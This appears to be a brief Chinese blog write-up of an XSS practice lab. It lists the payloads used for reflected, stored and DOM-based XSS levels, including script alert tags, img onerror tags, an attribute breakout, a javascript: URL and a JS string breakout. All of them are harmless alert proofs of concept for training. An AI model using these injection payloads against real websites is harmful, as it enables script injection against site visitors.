xss_靶场题目测试

第一题:反射性xss(get)

 

 

 

 

输出的字符出现在url中

第二题:反射性xss(post)

登录后输入<script>alert(1)</script>

 

 

第三题:存储型xss

输入<img src=http://1.html onerror=alert(1)>

 

 

第四,五题:domxss:

输入:'><img src="#" onmouseover="alert('xss')">

 

 

 

 

 

 

第七题:

输入:<img src=0+onerror="alert(123)">

 

 

第八题:xss之htmlspecialchars
审查元素后发现输入的内容是被拼接在<a href ="输入的内容">中

输入:javascript:alert(1)

 

 

第九题:xss之href输出

 

 

第十题:

输入:';alert(1)//

 

 

posted @ 2021-01-25 10:25  不愿透露姓名的汤姆猫  阅读(130)  评论(0编辑  收藏  举报